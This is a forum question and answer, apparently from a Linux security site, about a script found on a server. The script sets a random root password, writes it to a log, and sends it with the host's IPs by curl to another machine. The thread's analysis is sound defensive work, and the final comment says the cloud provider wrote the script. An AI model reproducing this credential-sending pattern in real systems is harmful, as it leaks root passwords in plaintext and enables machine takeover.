# Is the attached script an attept to crack passwords?

Tags: linux, security

I found this entry in my crontab:

```
#@reboot /usr/local/bin/email_passwordscript.sh
```

Although it is commented out, it worried me so I looked for this script in /usr/local/bin.  I found the following script in my  folder, but interestingly with a different name (set_password.sh):

```
#!/bin/sh

PASSWORD=$1

if [ "$#" -eq 0 ]; then
    IPS=$(hostname -I)
    PASSWORD=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | head -c 12)
    IPS=$(echo $IPS | sed 's/ /%20/g')
    OLD_PASSWORD=1
fi

echo "PASSWORD IS $PASSWORD" >> /var/log/new_passwordscript.log
echo "root:$PASSWORD" | chpasswd

hostname_str=`hostname`
sed -i "s/%HOSTNAME%/$hostname_str/" /etc/zabbix/zabbix_agentd.conf

if [ $OLD_PASSWORD == 1 ]; then
    curl -X GET "http://172.16.98.14:8887/passwordemailservice?ip=$IPS&password=$PASSWORD" >> /var/lo
g/passwordscript.log
fi
```

Is this an attempt to hack my machine?  If so, can anyone offer clues on how this has happened?  It appears to be someone on my local network, but that IP address does not provide any clues i.e. there is no response.

Answer (score 1, accepted):

## **This code seems dangerous.**

The code changes the root password of a machine and sends the IP address of the machine along with its password to a remote computer.

---

## How it works:

```
PASSWORD=$1
```

Assigns the first argument in the call to password

```
if [ "$#" -eq 0 ]; 
    IPS=$(hostname -I)
    PASSWORD=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | head -c 12)
    IPS=$(echo $IPS | sed 's/ /%20/g')
    OLD_PASSWORD=1
fi
```

Checks to see if there is an argument e.g ./email_passwordscript.sh XXX. If there isn't one it will generate a random password.

```
 echo "root:$PASSWORD" | chpasswd
```

This line changes the password

```
curl -X GET "http://172.16.98.14:8887/passwordemailservice?ip=$IPS&password=$PASSWORD"
```

Sends the password to a remote server.

### How Did it happen?

This is difficult to answer as there are many ways this script could have gotten on to your computer such as:

- Someone having physical access to your machine
- Unintentionally installing malicious software

Comment: Thanx!  That was what I thought.  Apparently, my cloud provider creates that file to email the password once when the machine is created.  I asked them how they got access to my server to do that, but they did not respond.  Sounds shady... but at least I have not got hacked!